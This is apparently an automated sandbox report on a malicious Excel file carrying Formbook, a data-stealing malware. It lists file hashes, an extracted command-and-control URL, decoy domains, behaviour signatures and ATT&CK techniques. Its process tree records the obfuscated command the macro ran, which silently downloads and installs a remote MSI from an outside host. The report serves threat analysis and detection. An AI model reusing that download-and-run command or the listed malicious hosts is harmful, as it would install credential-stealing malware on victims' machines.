Analysis

  • max time kernel
    148s
  • max time network
    146s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    06-05-2021 17:04

General

  • Target

    18a6d23e_by_Libranalysis.xls

  • Size

    37KB

  • MD5

    18a6d23e499cec73758a943dc9392821

  • SHA1

    583fdda8b474d1ef4d16e250b4d901014377e988

  • SHA256

    fc6028f1731d7c612c6a4b848df098cfaa7d3caac1a098c526d9eb24d46bd6c2

  • SHA512

    7e08d609fbc8eb9c0e364bae2bfde135a864b9c3bfb779aff77724d5b79b50f441d8843ff29413de7b0e676aa19b156997405792d13321ad48de5dd9eda9fb62

Malware Config

Extracted

Family

formbook

Version

4.1

C2

http://www.craftsman-vail.com/cca/

Decoy

whenpigsflyhigh.com

artistiklounge.com

tinytrendstique.com

projektpartner-ag.com

charvelevh.com

easycompliances.net

zengheqiye.com

professionalmallorca.com

bonzerstudio.com

nelivo.com

yangxeric.com

aredntech.com

twincitieshousingmarket.com

allshadesunscreen.com

xiang-life.net

qmcp00011.com

lindsayeandmarkv.com

fbcsbvsbvsjbvjs.com

saveonthrivelife.com

newdpo.com

Signatures

  • Formbook

    Formbook is a data stealing malware which is capable of stealing data.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Formbook Payload 2 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Use of msiexec (install) with remote resource 1 IoCs
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Windows directory 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • NSIS installer 6 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Modifies data under HKEY_USERS 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 31 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 50 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SendNotifyMessage 4 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1272
    • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\18a6d23e_by_Libranalysis.xls
      2⤵
      • Enumerates system info in registry
      • Modifies Internet Explorer settings
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2040
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C m^SiE^x^e^c /i http://farm-finn.com/admin/tgh66091.msi /qn
        3⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:1840
        • C:\Windows\SysWOW64\msiexec.exe
          mSiExec /i http://farm-finn.com/admin/tgh66091.msi /qn
          4⤵
          • Use of msiexec (install) with remote resource
          • Suspicious use of AdjustPrivilegeToken
          PID:1720
    • C:\Windows\SysWOW64\wscript.exe
      "C:\Windows\SysWOW64\wscript.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1892
      • C:\Windows\SysWOW64\cmd.exe
        /c del "C:\Windows\Installer\MSI4924.tmp"
        3⤵
          PID:1992
    • C:\Windows\system32\msiexec.exe
      C:\Windows\system32\msiexec.exe /V
      1⤵
      • Blocklisted process makes network request
      • Enumerates connected drives
      • Drops file in Windows directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1072
      • C:\Windows\Installer\MSI4924.tmp
        "C:\Windows\Installer\MSI4924.tmp"
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of SetThreadContext
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of WriteProcessMemory
        PID:1124
        • C:\Windows\Installer\MSI4924.tmp
          "C:\Windows\Installer\MSI4924.tmp"
          3⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          PID:1756

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Discovery

    Query Registry

    2
    T1012

    Peripheral Device Discovery

    1
    T1120

    System Information Discovery

    3
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Windows\Installer\MSI4924.tmp
      MD5

      32b4cdd8df63b6e2fd06d9c3f70983e2

      SHA1

      56a0cb8f39d7740fa2eb4a3803b20235a9750eb4

      SHA256

      5432639b7cf4aff9b0511e5afa6ef16e5eff79cd7236562c15ea681973569f61

      SHA512

      b89c80661d1240df84a71c2c4bff66e86d41bcc61c9cc1263c0be2dbb64fbc0f7907468faf4098f7ae3eb8f6386aaab2a568747549431cbc7987eb95ba696bde

    • C:\Windows\Installer\MSI4924.tmp
      MD5

      32b4cdd8df63b6e2fd06d9c3f70983e2

      SHA1

      56a0cb8f39d7740fa2eb4a3803b20235a9750eb4

      SHA256

      5432639b7cf4aff9b0511e5afa6ef16e5eff79cd7236562c15ea681973569f61

      SHA512

      b89c80661d1240df84a71c2c4bff66e86d41bcc61c9cc1263c0be2dbb64fbc0f7907468faf4098f7ae3eb8f6386aaab2a568747549431cbc7987eb95ba696bde

    • C:\Windows\Installer\MSI4924.tmp
      MD5

      32b4cdd8df63b6e2fd06d9c3f70983e2

      SHA1

      56a0cb8f39d7740fa2eb4a3803b20235a9750eb4

      SHA256

      5432639b7cf4aff9b0511e5afa6ef16e5eff79cd7236562c15ea681973569f61

      SHA512

      b89c80661d1240df84a71c2c4bff66e86d41bcc61c9cc1263c0be2dbb64fbc0f7907468faf4098f7ae3eb8f6386aaab2a568747549431cbc7987eb95ba696bde

    • \Users\Admin\AppData\Local\Temp\nsx49AE.tmp\juw9gxx34fgqj.dll
      MD5

      c0903517afa29eb5aa5ce627b447f031

      SHA1

      b337659ad551e409836e5d51e161ae5b46269378

      SHA256

      4bd83d6b82767ff08aaade6bee60bdb5717b1462dac53997adf2ae831ae0f462

      SHA512

      5e086cbac7010f6a88ac7c2dfcd8dce6dcf1e459434fac1536424921660a7bb8390a14103821e6db007c3846907fb7dc904312fc25b1519e40215a754903656d

    • memory/1072-66-0x000007FEFC141000-0x000007FEFC143000-memory.dmp
      Filesize

      8KB

    • memory/1124-72-0x0000000000440000-0x0000000000442000-memory.dmp
      Filesize

      8KB

    • memory/1124-67-0x0000000000000000-mapping.dmp
    • memory/1272-85-0x0000000006110000-0x000000000621B000-memory.dmp
      Filesize

      1.0MB

    • memory/1272-78-0x00000000062E0000-0x0000000006450000-memory.dmp
      Filesize

      1.4MB

    • memory/1720-64-0x0000000000000000-mapping.dmp
    • memory/1720-65-0x0000000076281000-0x0000000076283000-memory.dmp
      Filesize

      8KB

    • memory/1756-73-0x000000000041EB70-mapping.dmp
    • memory/1756-76-0x0000000000770000-0x0000000000A73000-memory.dmp
      Filesize

      3.0MB

    • memory/1756-75-0x0000000000400000-0x000000000042E000-memory.dmp
      Filesize

      184KB

    • memory/1756-77-0x00000000003E0000-0x00000000003F4000-memory.dmp
      Filesize

      80KB

    • memory/1840-63-0x0000000000000000-mapping.dmp
    • memory/1892-79-0x0000000000000000-mapping.dmp
    • memory/1892-80-0x0000000000FF0000-0x0000000001016000-memory.dmp
      Filesize

      152KB

    • memory/1892-81-0x0000000000070000-0x000000000009E000-memory.dmp
      Filesize

      184KB

    • memory/1892-83-0x0000000000C20000-0x0000000000F23000-memory.dmp
      Filesize

      3.0MB

    • memory/1892-84-0x00000000009F0000-0x0000000000A83000-memory.dmp
      Filesize

      588KB

    • memory/1992-82-0x0000000000000000-mapping.dmp
    • memory/2040-62-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/2040-60-0x000000002FD91000-0x000000002FD94000-memory.dmp
      Filesize

      12KB

    • memory/2040-61-0x0000000071941000-0x0000000071943000-memory.dmp
      Filesize

      8KB

    • memory/2040-86-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB